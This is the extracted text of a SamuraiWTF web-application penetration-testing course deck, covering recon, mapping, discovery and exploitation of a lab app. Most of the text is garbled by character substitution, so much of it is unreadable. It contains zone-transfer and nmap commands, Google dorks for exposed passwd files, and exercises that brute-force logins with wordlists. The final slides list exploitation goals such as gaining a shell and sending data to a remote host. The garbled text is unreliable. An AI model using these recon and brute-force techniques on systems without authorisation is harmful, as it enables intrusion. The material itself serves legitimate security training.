SamuraiWTF Course v17 - Slides

1 Copyright 2012, 2013 Justin Searle www.utilisec.
com
Assessing and Exploiting Web Applications
with SamuraiWTF
Justin Searle
Managing Partner UtiliSec
justin@meeas.com // justin@utilisec.com
+1 801 784 2052
2 Copyright 2012, 2013 Justin Searle www.utilisec.com
Zl based Course vlrLual Machlne
Make sure LhaL laLesL verslon of vMware layer
or luslon ls lnsLalled
vlrLual8ox should work, buL no promlses
Copy course les Lo your compuLer
unzlp Lhe SamuralW1l vlrLual machlne
lrom Lhe "llle" menu ln vMware, choose "Cpen"
and selecL Lhe .vmx le ln Lhe exLracLed folder
verlfy Lhe vlrLual machlne can communlcaLe on
Lhe neLwork lf you are connecLed Lo Lhe lnLerneL
lSC based Course vlrLual Machlne
Copy Lhe SamuralW1l lSC le Lo your hard drlve
Cpen your vlrLual machlne soware and creaLe a new vlrLual
machlne wlLhouL uslng Lhe auLomauc lnsLallauon opuons
lf you are uslng vMware layer, WorksLauon, or luslon:
When warned abouL an lnsLallauon dlsk, selecL "Conunue wlLhouL dlsc"
When asked abouL lnsLallauon medla, choose "CreaLe a cusLom vlrLual
machlne" or "l wlll lnsLall Lhe operaung sysLem laLer"
When asked abouL your Cperaung SysLem choose "Llnux" and "ubunLu"
Clve Lhe vlrLual machlne 2C8 8AM
1ake defaulLs on all oLher semngs
Cnce creaLed, edlL your vlrLual machlne and polnL Lhe vM
machlne's Cu/uvu vlrLual drlve a Lhe SamuralW1l lSC
8ooL your vlrLual machlne and verlfy SamuralW1l sLarLs up
Look around and see lf your nelghbors need any help !
Assessing and Exploiting Web Applications
with SamuraiWTF
Justin Searle
Managing Partner UtiliSec
justin@meeas.com // justin@utilisec.com
+1 801 784 2052
CC Aurlbuuon-ShareAllke
For more details, visit http://creativecommons.org/licenses/by-sa/3.0/
If you use these slides, please offer the course under a different name so people don't confuse it with our official course.
Course ConLrlbuLors
!"#$%& (#)*"$%
!usun Searle - [usun[uullsec.com - [meeas
8aul Slles - raul[Laddong.com - [Laddong

!"#$%& +,"-%"$%
uullSec - hup://www.uullsec.com
Secure ldeas L.L.C. - hup://www.secureldeas.neL
1addong S.L. - hup://www.Laddong.com
Course CuLllne
lnLroducuon Lo SamuralW1l
1esung MeLhodology
Mapplng Appllcauons
ulscoverlng vulnerablllues
Lxplolung vulnerablllues
SLudenL Challenge
Appendlx MaLerlals (ume permlmng)
SamuralW1l
Llve Lesung envlronmenL as a booLable uvu
8ased on ubunLu Llnux
Cver 100 Lools, exLenslons, and scrlpLs, lncluded:
- recon-ng
- w3af
- 8eLl
- 8urp SulLe
- CWAS ZA
- 8aL roxy
- ulr8usLer
- CeWL
- Sqlmap
- MalLego CL
- WebScarab
- nmap
- nlkLo
- MeLasplolL
SamuralW1l 2.0
CompleLe rebulld of Lhe dlsLrlbuuon
lncludes kuL, Cnome, and unlLy
uoubled Lhe number of Lools
All Lools now accesslble ln $A1P
Moved all soware and congurauons Lo ueblan
packages... (work ln progress)
upgrade all Lools wlLh "sudo apL-geL upgrade"
Add SamuralW1l Lools Lo any ubunLu/ueblan
lnsLallauon by edlung "/eLc/apL/sources.llsL"
laclllLaLes collaborauon wlLhln dev Leam
Maln pro[ecL page:
hup://www.samural-wu.org
8ug and feaLure requesLs Lrackers aL:
hups://sourceforge.neL/p/samural/bugs/
hups://sourceforge.neL/p/samural/feaLure-requesLs/
uevelopmenL malllng llsL aL:
hup://sourceforge.neL/p/samural/mallman/
ro[ecL Leads:
kevln !ohnson - k[ohnson[secureldeas.neL - [secureldeas
!usun Searle - [usun[uullsec.com - [meeas
8aul Slles - raul[Laddong.com - [Laddong
ro[ecL u8Ls
Logglng ln and uslng sudo/kdesudo/gLksudo
username: samural
assword: samural
hup://whausLhesamuralpassword.com
Chooslng kuL, Cnome, or unlLy
SamuralW1l 1ools and uocumenLauon
llrefox LxLenslons
hups://addons.mozllla.org/en-uS/refox/collecuons/rslles/
samural/
Web-based 1ools and 1argeLs
WalkLhrough of SamuralW1l
Because we are professional pen-testers
You cant see the wood for the trees
Testing Methodology
8lack 8ox 1esung (eneLrauon 1esung)
Llule Lo no lnformauon ls provlded abouL Lhe LargeL
1esung Lechnlques sLarL wlLh looklng for speclc vulnerablllLy slgns buL
qulckly moves lnLo unscrlpLed explorauon, Lrlal and error
1esung focuses on manlpulaung lnpuLs and evaluaung responses
A form of reverse englneerlng of exposed funcuonallLy
WhlLe 8ox or CrysLal 8ox 1esung (noL enLesung)
lncludes securlLy focused Lesung llke:
source code revlews
auLhenucaLed vulnerablllLy assessmenLs
congurauon audlLs
More of a scrlpLed LesL looklng for speclc lLems
Crey 8ox 1esung (Cpumlzed eneLrauon 1esung)
1esung LhaL uses black box Lechnlques wlLh greaLer vlslblllLy and/or access
Lo Lhe appllcauon Lo opumlze Lesung
1ypes of 1esLs
A slmple meLhodology:
.&/"-: CaLherlng lnformauon
from exLernal sources abouL
your LargeL
01,,2-3: Learnlng abouL Lhe
LargeL app from a user's Anu a
developer's perspecuve
42%/"5&$6: Learnlng Lhe app
from an auacker's perspecuve
78,9"2)1:"-: Auempung Lo
measure Lhe Lrue rlsk of
dlscovered vulnerablllues
Successful explolLauon oen
leads Lo new funcuonallLy Lo
map and a second layer of
vulnerablllues Lo dlscover
lormal MeLhodology
.&/"-
01,,2-3 78,9"2)1:"-
42%/"5&$6
We sull follow Lhe overall
clockwlse ow, buL we oen
move back and forLh beLween
processes
1rlck ls Lo keep focused and
progresslng Lhrough Lhe sLeps
Ceneral rule for devlauon
from clockwlse progresslon:
Make lL a consclous declslon
LlmlL Lo 3 auempLs or 3 mlnuLes
uocumenL whaL you dld and
whaL you would do nexL
lorce yourself Lo reLurn Lo your
currenL meLhodology sLep
MeLhodology ln 8eal Llfe
.&/"-
01,,2-3 78,9"2)1:"-
42%/"5&$6
Mutillidae are a family of wasps whose wingless females resemble ants. Their
common name velvet ant refers to their dense hair which may be red, black,
white, silver, or gold. They are known for their extremely painful sting,
facetiously said to be strong enough to kill a cow, hence the common name cow
killer or cow ant is applied to some species. -- Wikipedia
First Target: Dojo-Basic
(#)*"$: !usun Searle
+2)&: (currenLly only avallable on SamuralW1l 2.x)
;#$,"%&: A P/MySCL web appllcauon LhaL
lmplemenLs Lhe CWAS 1op 10 vulnerablllues. 1hls
pro[ecL was forked from Adrlan "lrongeek" Crenshaw's
Lhe 1.x branch of Muullldae
(//&%%2-3: hup://do[o-baslc
<&1)#$&%:
8aslc web app deslgned for rsL ume web pen-LesLers
Lasy Lo nd and explolL vulnerablllues
lncludes learnlng hlnLs
Mapped Lo CWAS 1op 10
Samural uo[o-8aslc
01,,2-3 =""9%:
nmap & Zenmap
llrefox
1llL
Wappalyzer
loxyroxy
ZA roxy
llrebug
ZA Splder
8urp Splder
42%/"5&$6 =""9%:
nlkLo
ulr8usLer
8a
ZA Scanner
w3af
lMacro
CeWL
ZA luzzer
ZA 1okenCen
8urpsulLe Sequencer
user AgenL SwlLcher
78,9"2)1:"- =""9%:
Cookles Manager+
sqlmap
Laudanum
8eLl
1esung lan for uo[o-8aslc
Gathering information from external sources about your target
The most under utilized steps

Reconnaissance
8econnalssance 1asks
Whols Cuerles
unS lnLerrogauon
Search Lnglne ulgglng
Soclal neLwork
Parvesung
ulscovery
8econ ls one of Lhe mosL under uullzed sLeps
llndlngs here allow you Lo sLarL bulldlng assumpuons Lo
LesL
rovldes key lnformauon needed for laLer sLeps
Selecuon and verlcauon (mosL lmporLanL) of LargeLs
lnformauon abouL Lechnologles used and congurauons
LlsLs of users, employees, and organlzauon lnfo
assword reseL lnformauon and conLacL lnformauon
1rusL relauonshlps Lo explolL (frlends and managers)
Lven occaslonally nd code snlppeLs wlLh vulnerablllues and
auLhenucauon lnformauon
(oLenually) WlLhouL Louchlng" LargeL envlronmenL
8econnalssance
WhaL ls WPClS & 8l8s?
A proLocol for searchlng lnLerneL reglsLrauon daLabases based on 8lC 3912
for domaln names, ls, and auLonomous sysLems (AS)
8eglonal l 8eglsLrars: AfrlnlC, AnlC, A8ln, LACnlC, 8lL
Common Lools Lo use:
"whols" command llne Lool (sLandard wlLh Llnux and Macs)
hup://www.whols.neL or hup://www.lnLernlc.neL/whols.hLml
Lxamples Lo 1ry:
whois secureideas.net
whois 66.135.50.185
whois "kevin johnson" (should fail, why?)
whois -h whois.arin.net "kevin johnson"
uomaln and l 8eglsLrauons
Common Lools:
hosL (defaulL on Llnux and Macs)
dlg (defaulL on Llnux and Macs)
nslookup (defaulL on everyLhlng)
lorward lookups:
host www.samurai-wtf.org
dig www.samurai-wtf.org
nslookup www.samurai-wtf.org
8everse lookups:
host 66.135.50.185
dig -x 66.135.50.185
nslookup 66.135.50.185

unS lnLerrogauon
Made so admlnlsLraLors don'L have Lo updaLe each unS server separaLely (unS
server synchronlzauon)
Cen le wlde open lnLernally and occaslonally Lo Lhe lnLerneL
MusL query an auLhorlLauve server for Lhe domaln
Make sure you Lry all auLhorlLauve servers, only one mlghL work
Lxamples Lo Lry:
dig -t AXFR secureideas.net (should fall, why?)
dig -t NS secureideas.net
dig -t AXFR secureideas.net @ns1.secureideas.net
dig -t AXFR secureideas.net @ns2.secureideas.net
host -la secureideas.net (should work, why?)
host -t ns secureideas.net
host -la secureideas.net ns1.secureideas.net
host -la secureideas.net ns2.secureideas.net

unS Zone 1ransfers
(#)*"$: 8Snake
+2)&: hup://ha.ckers.org/erce
;#$,"%&: erforms forward and reverse lookups
recurslvely unul LargeL ls and domalns are exhausLed
(wordllsL based)
>1-3#13&: erl
+6-)18:
fierce -dns <target_domain>
781?,9&% )" )$6:
fierce dns secureideas.net
fierce dns meeas.com
fierce dns utilisec.com
llerce uomaln Scanner
WhaL ls Coogle hacklng?
uslng Coogle advanced operaLors Lo search for lnLeresung"
lnformauon
!onny Long's CPu8
hup://www.hackersforcharlLy.org/ghdb
Also greaL for Soclal neLwork larmlng
Lxamples:
intitle:"Index+of..etc"+passwd
intitle:admin+intitle:login
intitle:index.of.private
intitle:"ColdFusion+Administrator+Login"
filetype:asmx OR filetype:jws
inurl:asmx?wsdl OR inurl:jws?wsdl

Coogle Packlng / Coogle uorks
recursor Lo Soclal neLworks
useneL (Coogle Croups - ue[a news acqulsluon)
Malllng llsLs
Web lorums
Modern day Soclal neLworks
lacebook
Llnkedln
Myspace
1wluer
nlng
CrkuL
Several meLhods exlsL Lo harvesL daLa from Lhese slLe
Soclal neLworks
1radluonal vs. nexL Cenerauon
new resources
8lch web Lechnologles
eople llke bulldlng Lools
CaveaLs
ulsclosure of cusLomer daLa
Acuve vs. asslve recon
noL all daLa ls free.
8lurs Lhe meLhodology
orL scan, enumeraLe, dlscover vulns, harvesL
credenuals.
nexL Cenerauon 8econ
(#)*"$: 1lm (LanMaSLe833) 1omes
+2)&: hup://recon-ng.com
;#$,"%&: CompleLely modular reconnalssance
framework. AuLomaLes full scope open source
reconnalssance. Cne-sLop shop for recon.
>1-3#13&: yLhon
.&/"-@-3 A")&%:
Modular
uaLa drlven
Slmllar Lo MeLasplolL
Well documenLed
Analyuc llmlLauons

8econ-ng
8aslc 8econ-ng lnLerface and usage
Ma[or 8econ-ng feaLures
Parvesung conLacLs
Parvesung creds
Parvesung hosLs
ushln lnLegLrauon
Creaung reporLs
uslng 8econ-ng
Learning about the target app from the user's perspective ...
... AND the developer's perspective

Mapping
Mapplng 1asks
ldenufy 1echnologles
luncuonal Analysls
rocess llow Modellng
8econ
ulscovery
8equesL/8esponse
8asellne
(#)*"$: lyodor (Cordon Lyon) and many more
+2)&: hup://nmap.org
;#$,"%&: remler 1C/l hosL and porL scannlng Lool.
Also provldes excellenL CS ngerprlnung, servlce
ngerprlnung, and Lhe nmap Scrlpung Lnglne (nSL)
whlch provldes advanced and cusLomlzable funcuonallLy
>1-3#13&: C/C++ (LuA for nSL scrlpLs)
+6-)18:
nmap [opuons] <LargeL>
sudo nmap [opuons] <LargeL>

nmap
nmap 127.42.84.0/29
orL scans Lop 1000 1C porLs.
nmap sP 127.42.84.0-7
lng sweep 8 localhosL addresses (acLually does an A8, lCM, Lhen 1C 80)
nmap -p 80,443 127.42.84.0/29
orL scans 1C porLs 80 & 443
sudo nmap -A 127.42.84.0/29
orL scans Lop 1000 1C porLs, ngerprlnLs CS and servlces, Lhen runs nSL scrlpLs
sudo nmap A p- localhost
orL scans all 63333 1C porLs, ngerprlnLs Lhem, and runs nSL scrlpLs
sudo nmap -sU 127.42.84.0/29
orL scans Lop 1000 uu porLs
sudo nmap -sU p- localhost
orL scans all 63333 uu porLs. llnd more porLs?
sudo nmap sU -p- -A localhost
orL scans all 63333 uu porLs, ngerprlnLs Lhem, and runs some nSL scrlpLs.
WA8nlnC: Servlce scannlng uu porLs on Lhe lnLerneL can be vL8? slow
nmap 8aslcs
llndlng Lhe rlghL balance beLween speed and false negauves
1une your opuons on a subseL of ls (rsL /24 of 127.42.0.0/16)
sudo nmap -p 80,443 127.42.0.0/24
sudo nmap -n PN -p 80,443 T5 127.42.0.0/24
sudo nmap -n PN -p 80,443 T5 --max-retries 0 127.42.0.0/24
sudo nmap -n -PN -p 80,443 --max-rtt-timeout 100 --min-rtt-timeout 25
--initial-rtt-timeout 50 --max-retries 0 127.42.0.0/24
sudo nmap -n -PN -p 80,443 --min-rate 10000 --min-hostgroup 4096
--max-retries 0 127.42.0.0/24
now we have a nely Luned scan, leLs run on Lhe full /16 subneL
sudo nmap -n -PN -p 80,443 --min-rate 10000 --min-hostgroup 4096
--max-retries 0 -oN /tmp/AllIPs-WebPorts v --reason 127.42.0.0/16
undersLandlng nmap Scrlpung Lnglne (nSL)
ls /usr/share/nmap/scripts | grep -iE http|html
nmap Cpumlzauon
(#)*"$: Adrlano MonLelro Marques and nmap pro[ecL
+2)&: hup://nmap.org/zenmap
;#$,"%&: Craphlcal nmap lnLerface Lo make lL easler for
beglnners, provlde baslc analysls capablllues, faclllLaLe
rescans, dlsplay neLwork Lopologles, and compare scans
>1-3#13&: C/C++
+1?#$12 A")&%:
Slnce many scans requlre rooL, Zenmap when sLarLed from Lhe
menu on SamuralW1l runs as rooL. 1o run lL as a normal user,
run "zenmap" from Lhe command prompL

Zenmap
Zenmap 1opology
I
m
a
g
e

s
o
u
r
c
e
:

n
m
a
p
.
o
r
g
.

(#)*"$: Mozllla loundauon
+2)&: hup://www.mozllla.org
;#$,"%&: A full feaLured, cross plauorm web browser.
now lncludes a moblle verslon for your smarLphone
>1-3#13&: C++
A")1B9& <&1)#$&%: LxLenslons (add-ons)!!!
!15&1)%: ..sull Lhlnklng..
C%&D#9 ;&-)&%)&$ =$2/E:
Cpen a second llrefox process and prole:
refox - -no-remoLe
llrefox
age lnfo
ueLermlne lf page ls sLauc or dynamlc vla modlcauon daLe
Shows u8Ls for all medla ob[ecLs ln Lhe page
Lrror Console
ueLermlne lf you browser ls properly renderlng Lhe page
vlew age Source and vlew Selecuon Source
used Lo qulckly expose source code of selecLed conLenL
lnspecL LlemenL (new ln llrelox 10)
used Lo assoclaLe code and rendered elemenLs
1llL (new ln llrelox 11)
3u Craphlcal represenLauon of Lhe page source code
8ullL-ln llrefox 1ools
(#)*"$: LlberL l
+2)&: hup://wappalyzer.com
;#$,"%&: ldenues varlous soware
componenLs and Lechnologles used on webslLes.
>1-3#13&: llrefox add-on
<&1)#$&%:
llngerprlnL CS, webserver, web frameworks, and
server-slde programmlng language
8eporLs Lracklng.

Wappalyzer
1esung Lools LhaL "Man-ln-Lhe-Mlddle" your own
Lramc
rovlde a hlsLorlc record of all lnLeracuons wlLh
Lhe appllcauon
rovlde ablllLy Lo lnLercepL and modlfy requesLs
rovlde addluonal Lools Lo manlpulaLe and
lnLeracL wlLh Lhe appllcauon
rovlde a slngle locauon Lo Lrack all of your noLes
and ndlngs
lnLercepuon roxles
(#)*"$: Lrlc P. !ung
+2)&: hup://geuoxyproxy.org
;#$,"%&: Web browser proxy swlLcher
<&1)#$&%: 8aslc, SLandard, lus.
hup://geuoxyproxy.org/downloads.hLmledluons
78&$/2%&:
Check all opuons/proxles & creaLe a new local proxy
L.g. ZA localhosL:8081
loxyroxy
>&1F: Slmon 8enneus (sllnon)
+2)&: hup://code.google.com/p/zaproxy
;#$,"%&: An lnLercepuon proxy wlLh lnLegraLed Lools Lo nd
vulnerablllues. 1hls pro[ecL was forked from aros roxy and ls
acuvely malnLalned (unllke aros).
>1-3#13&: !ava
A")1B9& <&1)#$&%:
Save/8esLore sesslon sLaLe
orL Scanner
Acuve and asslve Scanner
Splder, 8ruLe lorce, luzzlng Lools
noLes and alerLs
Clobal search capablllues
LxLenslon feaLure (Lokengen, hlghllghung, dl, A!A splder, eLc...)
Zed Auack roxy (ZA)
Congurlng llrefox Lo LrusL ZA's dynamlc SSL
cerucaLes
Pave ZA generaLe a SSL 8ooL CA
Save Lhe cerucaLe Lo your le sysLem
lmporL lL lnLo llrefox
use loxyroxy Lo qulckly congure llrefox Lo use
ZA as a proxy
uslng llrefox wlLh ZA
(#)*"$: llrebugWorklngCroup eL. al.
+2)&: hup://geulrebug.com
;#$,"%&: SeL of web developmenL Lools
<&1)#$&%:
lnspecL & modlfy P1ML, CSS, ML, uCM.
!avaScrlpL debugger & proler
Lrror ndlng & monlLor neLwork acuvlLy

llrebug
WhaL funcuonallLy does Lhe appllcauon provlde?
Pave you vlslLed every page and recorded every requesL/response palr?
Are Lhere any pages LhaL should be blackllsLed from our acuve Lools?
Whlch operaung sysLem ls hosung Lhe appllcauon?
Whlch web server and/or appllcauon server ls hosung Lhe appllcauon?
Whlch language ls Lhe appllcauon wrluen ln?
Whlch programmlng model dld Lhe developer use?
lronL ConLroller uses a slngle page for all funcuonallLy
/lndex.aspx?acuonAdd1oCard&lLem42
age ConLroller uses a separaLe page for each funcuon
/Add1oCarL.php?lLem42
Model vlew ConLroller (MvC) can be much more complex, oen uslng Lhe resource
paLh Lo speclfy lnpuL lnsLead of acLual les and dlrecLorles
/roducL/Add1oCard/42
uo sequenual process ows exlsL?
Manual Mapplng Lxerclse
A unlque feaLure of
ZA
8urp allows commenLs
and hlghllghung, buL
Lhls ls even beuer
Addlng AlerLs
2 - Click
3 - Explain
keeps Lrack of all your alerLs
rovldes summary counLs
vlewlng Saved AlerLs
8esulLs wlll llkely nd many more pages
and les Lhan your manual mapplng
now slgnled by Lhe splder lcon ln Lhe slLe map
AuLomaLed Mapplng Lxerclse
2 - Click
3 - Click
(#)*"$: orLSwlgger LLd.
+2)&: hup://porLswlgger.neL
urpose: A web appllcauon assessmenL sulLe of Lools lncludlng an lnLercepuon
proxy, splderlng Lool, llmlLed auack Lool, sesslon Lolken analyzer, and oLhers
A commerclal verslon exlsLs whlch adds an auLomaLed vulnerablllLy scanner and
exLended auack Lool
Language: !ava
noLable leaLures:
Cne of Lhe besL splders avallable
SmarL decodlng and encodlng
LxcellenL fuzzer (called lnLruder), however lLs crlppled ln Lhe free verslon
no acuve scanner ln Lhe free verslon
no save/resLore sesslon ln Lhe free verslon
Samural noLes:
lnLercepuon has been dlsabled by defaulL ln SamuralW1l. 1o re-enable, go Lo Lhe
roxy Cpuons Lab, under "lnLercepL cllenL requesLs", enable Lhe check box nexL Lo
"lnLercepL lf: (by defaulL, lnLercepuon of server responses ls dlsabled Loo)
8urp SulLe lree
uslng ZA and 8urp 1ogeLher
Allow you Lo geL Lhe besL of boLh Lools
Allows ZA Lo save and resLore your sesslon
for laLer use and archlve
FireFox ZAP Burp
Learning the app from an attacker's perspective ...
Vulnerability Discovery
ulscovery 1asks
AuLhenucauon
Sesslon ManagemenL
AuLhorlzauon
u
e
f
a
u
l
L

C
o
n
g
u
r
a
u
o
n

8
u
s
l
n
e
s
s

L
o
g
l
c

C
o
d
e

l
n
[
e
c
u
o
n

u
e
n
l
a
l

o
f

S
e
r
v
l
c
e

C
l
l
e
n
L
-
S
l
d
e

C
o
d
e

Mapplng
LxplolLauon
CWAS 1op 10
hups://www.owasp.org/lndex.php/
CaLegory:CWAS1op1enro[ecL
8uL Lhere are many more vulnerablllues
beyond Lhe 1op 10
Many vulnerablllues don'L L Lhe
descrlpuons of our common vulnerablllLy
caLegorles
Cen musL descrlbe Lhe vulnerablllues when
reporung on Lhem
So WhaL Are We Looklng lor?
(#)*"$: Sullo
+2)&: hup://clrL.neL/nlkLo2
;#$,"%&: A web server scanner LhaL ngerprlnLs,
correlaLes Lo known vulnerablllues, and looks for
known mallclous or poLenually dangerous les/
CCls
>1-3#13&: erl
+6-)18:
nlkLo -hosL <LargeL>

nlkLo
use nlkLo Lo scan do[o-baslc
8evlew Lhe resulLs and vlslL Lhe
"lnLeresung" pages

nlkLo Lxerclse
ZA Appllcauon lnLegrauon
nikto
(#)*"$: CWAS ro[ecL
+2)&: www.owasp.org/lndex.php/
CaLegory:CWASulr8usLerro[ecL
;#$,"%&: 8ruLe force of web dlrecLorles and les
>1-3#13&: !ava
;$"%:
very qulck for whaL lL does
Pas one of Lhe mosL exhausuve llsL (blg crawler on Lons of
webslLes), however Lhey are hlghly lnemclenL
!15&1)%:
Scans can Lake a vL8? long ume lf you use recurslon
Can overwhelm servers (connecuons and log dlsk sLorage)
ulr8usLer
8efore you do anyLhlng, Lurn o recurslon!
1akes lC8LvL8!
Scan hup://do[o-baslc" wlLh Lhe small dlrecLory llsL
ulsable recurslve checks and bruLe force le checks
Whlle Lhe scan ls runnlng, experlmenL wlLh Lhe number
of Lhreads
8e careful over 10 Lhreads lf you are on ln a vlrLual machlne!
llndlng unllnked 8esources
(#)*"$: 8a 1eam
+2)&: hup://code.google.com/p/ra
;#$,"%&: A sulLe of Lools LhaL uullze common shared
elemenLs Lo make Lesung and analysls easler. 1he Lool
(framework) provldes vlslblllLy ln Lo areas LhaL oLher
Lools do noL such as varlous cllenL slde sLorage
>1-3#13&: yLhon
<&1)#$&%:
Some of Lhe besL wordllsLs and newesL word llsLs for unllnked
les and dlrecLorles
!15&1):
ro[ecL ls only seml acuve and hasn'L had a sLable release yeL
8a
use ZA's 8ruLe lorce Lools Lo scan for unllnked
resources ln uo[o-8aslc
ulsable recurslve checkbox ln Lhe opuons
use Lhe 8a les llsL
use Lhe 8a dlrecLory llsL
8a's unllnked 8esource LlsLs
(#)*"$: Chrls ederlck
+2)&:
hup://addons.mozllla.org/en-uS/refox/addon/user-
agenL-swlLcher/
;#$,"%&: SwlLch Lhe user agenL of web browser
<&1)#$&%:
redened seL of user agenLs (lL, roboLs, lhone.)
llexlble edlLor Lo cusLomlze any user agenL
user AgenL SwlLcher
uo dlerenL user agenLs show you dlerenL conLenL or
funcuonallLy?
1ry moblle browser useragenLs for lhone and Androld
1ry search englne useragenLs llke "CoogleboL"
1ry securlLy scan englnes llke Cualys and McAfee Secure
uon'L forgeL Lo swlLch back Lo your defaulL uA!!!
use ZA luzzer wlLh Lhe useragenL llsL from
luzzu8 Lo fuzz uo[o-8aslc's home page
1esung for user AgenL lssues
8evlewlng asslve scan resulLs
SLarung and sLopplng acuve scans
8evlewlng Lhe alerLs
ZA Acuve Scannlng Lxerclses
(#)*"$: Andres 8lancho and many oLhers
+2)&: w3af.sourceforge.neL
;#$,"%&: Cne of Lhe mosL feaLure rlch open source web
audlung Lools for boLh auLomaLed and seml-auLomaLed
;*1%&%: Mapplng, dlscovery, and explolLauon
>1-3#13&: yLhon
A")1B9& <&1)#$&%:
Cholce of Cul and CLl lnLerfaces
very scrlpLable Lo re-audlL apps
lncludes mosL pyLhon based web audlung Lools
!15&1)%: sLablllLy and conslsLency lssues
!!!nLvL8!!! enable all pluglns
w3af
8aslc w3af AudlLs
2 - Target
Chooslng Lhe pluglns Lo LesL wlLh
uslng Lhe websplder plugln for baslc splderlng
uslng Lhe splderman plugln Lo geL around
auLhenucauon and blackllsung lssues
8eadlng Lhe resulLs
uslng our "3 mlnuLes / 3 auempLs" rule Lo Lry
w3af's explolLauon feaLures
uslng w3af
AuLomaLed Lools can only LesL lnpuLs LhaL Lhey
can nd
uo very well ndlng ln[ecuon aws
Some lnpuLs musL be manually LesLed lf Lhe
auLomaLed Lools can'L be Lralned Lo nd Lhem (Lhlnk
MvC archlLecLures and web servlces)
Loglc and archlLecLural aws musL be manually
LesLed slnce auLomaLed Lools cannoL undersLand
Lhe necessary conLexL
Also besL Lo manually check for hlgh-probablllLy
aws on ma[or lnpuLs
Manual ulscovery
(#)*"$: lCpus
+2)&: hup://www.lopus.com/lmacros/refox/
;#$,"%&: 8ecord, edlL, and scrlpL macros ln
llrefox for auLomaLed funcuonallLy
<&1)#$&%:
8ecord your acuons and edlL Lhem laLer
use looplng and varlables Lo furLher cusLomlze
ull daLaseLs from exLernal sources (CSv, u8s, ...)
Wrap macros ln scrlpLs for advanced funcuons
lMacro
uoes Lhe appllcauon auLhenucaLe users?
Pow do you logln, logouL, and change your
password?
Can you reseL or recover an accounL?
Are all of Lhese funcuons proLecLed by encrypuon?
uoes Lhe appllcauon reveal lf a username ls valld or
noL?
uoes Lhe appllcauon provlde user lockouL?
Can you guess any of Lhe passwords?
1esung AuLhenucauon
AuLhor: ulglnln[a (8obln Wood)
SlLe: hup://www.dlglnln[a.org/pro[ecLs/cewl.php
urpose: A wordllsL generaLor whlch collecLs
words by splderlng webslLes
Language: 8uby
leaLures: CusLom dlcLs are very useful
SynLax:
cewl [opuons] <LargeL>

CeWL
8evlew Lhe CeWL opuons
d: depLh
w: wrlLe Lo (dlcuonary) le
e: e-mall addresses
a: meLadaLa.
CreaLe a wordllsL for uo[o-8aslc
CeWL Lxerclse
use ZA luzzer Lo fuzz Lhe logln password for
"admln"
use Lhe llsL generaLed by Cewl
Ad[usL ZA luzzer's Lhread opuons
use response le slze Lo nd Lhe successful fuzz
auempL
use Zap's search feaLure Lo nd Lhe successful fuzz
auempL
use ZA luzzer Lo fuzz Lhe logln
password for "[ohn"
use Lhe [ohn.LxL llsL from luzzu8
luzzlng Loglns
uoes Lhe appllcauon Lrack sesslon sLaLe?
ls Lhe sesslon Loken predlcLable?
ls a new sesslon Loken provlded Lo you aL logln?
ls Lhe sesslon Loken deleLed upon logouL?
Are auLhenucaLed sesslon Lokens proLecLed by
encrypuon?
Are sesslon Loken cookle ags seL Lo secure and
PupCnly?
1esung Sesslon ManagemenL
1ry copy/pasLe lnLo Coogle
lf ls a hash of a common number or word,
Coogle wlll probably know lL
use an advanced Lool Lo generaLe 1000+
Lokens and analyze Lhem
8eallze LhaL hashes of sequenual numbers wlll
look random even Lo Lhese Lools ......
When Sesslon Look 8andom
Clear all cookles ln your browser
vlslL Lhe home page of uo[o-8aslc
llnd LhaL requesL ln ZA PlsLory
verlfy Lhe requesL was made wlLhouL cookles
and lLs response has a SeL-Cookle" for
sesslonld"
8lghL cllck requesL ln hlsLory and "CeneraLe
1okens..."
8evlew resulLs Lo verlfy LhaL
sesslon ls Lruly random (yes, lL ls)
ZA 1okenCen
Clear all cookles ln your browser
vlslL Lhe home page of uo[o-8aslc
llnd LhaL requesL ln 8urp's roxy PlsLory Lab
verlfy Lhe requesL was made wlLhouL cookles
and lLs response has a SeL-Cookle" for
sesslonld"
8lghL cllck requesL ln hlsLory and "SenL Lo
Sequencer"
verlfy LhaL 8urp ldenued Lhe rlghL
sesslon cookle and analyze

Sesslon Analysls wlLh 8urp
ls posL-auLhenucauon daLa or funcuonallLy
avallable Lo unauLhenucaLed users?
Can you manually make requesLs of
prlvlleged funcuonallLy or access prlvlleged
daLa whlle logged ln as an user LhaL should
noL have access Lo lL?
Can users access daLa from oLher users
LhaL Lhey should noL be able Lo
access?
1esung AuLhorlzauon
Where does Lhe appllcauon accepL user lnpuL?
Whlch lnpuLs are reecLed back Lo Lhe user?
uo Lhey accepL and execuLe cllenL slde code such as !avascrlpL?
Whlch lnpuLs are used ln querles Lo a daLabase?
uo Lhey accepL and execuLe SCL commands?
uo any lnpuLs appear Lo be used wlLh sysLem commands?
uo Lhey accepL and execuLe addluonal sysLem commands?
uo any lnpuLs appear Lo reference local les?
Can you reference and read arblLrary les on Lhe le sysLem?
uoes Lhe app execuLe servers-slde scrlpLs lf referenced?
uo any lnpuLs appear Lo reference remoLe les?
Can you read oLher les on LhaL sysLem?
Can you read les on oLher sysLems?
uoes Lhe app execuLe server-slde scrlpLs?
1esung for ln[ecuon llaws
osslble denlal of servlce lssues:
uo any requesLs Lake a relauvely long ume Lo
respond?
Can any lnpuLs force Lhe appllcauon Lo lncrease
processlng ume such as wlld card searches?
uo any lnpuLs appear Lo be wrluen Lo Lhe le sysLem
or log?
Can user accounLs be sysLemaucally locked ouL?
1esung for uenlal of Servlce
1echnologles lnclude
!avaScrlpL / A!A
llash
!ava AppleLs
SllverllghL
Coals for cllenL-slde code Lesung
undersLand how Lhe cllenL slde code communlcaLes Lo/from Lhe web
appllcauon
use all funcuonallLy ln cllenL-slde code Lo map requesLs Lo Lhe web
appllcauon
ldenufy requesLs from cllenL-slde code LhaL were noL exposed ln your
lnLerface (for varlous reasons)
ldenufy oLher "lnLeresung" or "sensuve" daLa embedded ln Lhe cllenL-slde
code
LasL Lwo sLeps oen requlre us Lo decomplle Lhe cllenL-slde code
1esung CllenL-Slde Code
Dojo-Basic Exploitation
LxplolLauon 1asks
rlorluze AuempLs
LxplolLauon
osL LxplolLauon
ulscovery
8econ
verlfylng ldenued vulnerablllues by auacklng
and explolung Lhem
Co aer Lhe daLa or funcuonallLy LhaL real
auackers would go aer
Successful explolLauon ls a sLepplng sLone and
should open up a new round of mapplng and
dlscovery
SLep 4: LxplolLauon
uownloadlng Lhe conLenLs of a daLabase
uploadlng a mallclous web page
Calnlng shell on Lhe server
Maklng a LargeL server send daLa Lo a remoLe hosL
lvoung from Lhe uMZ Lo Lhe lnLernal neLwork
Leveraglng a LargeL user's browser Lo scan Lhe lnLernal
neLwork
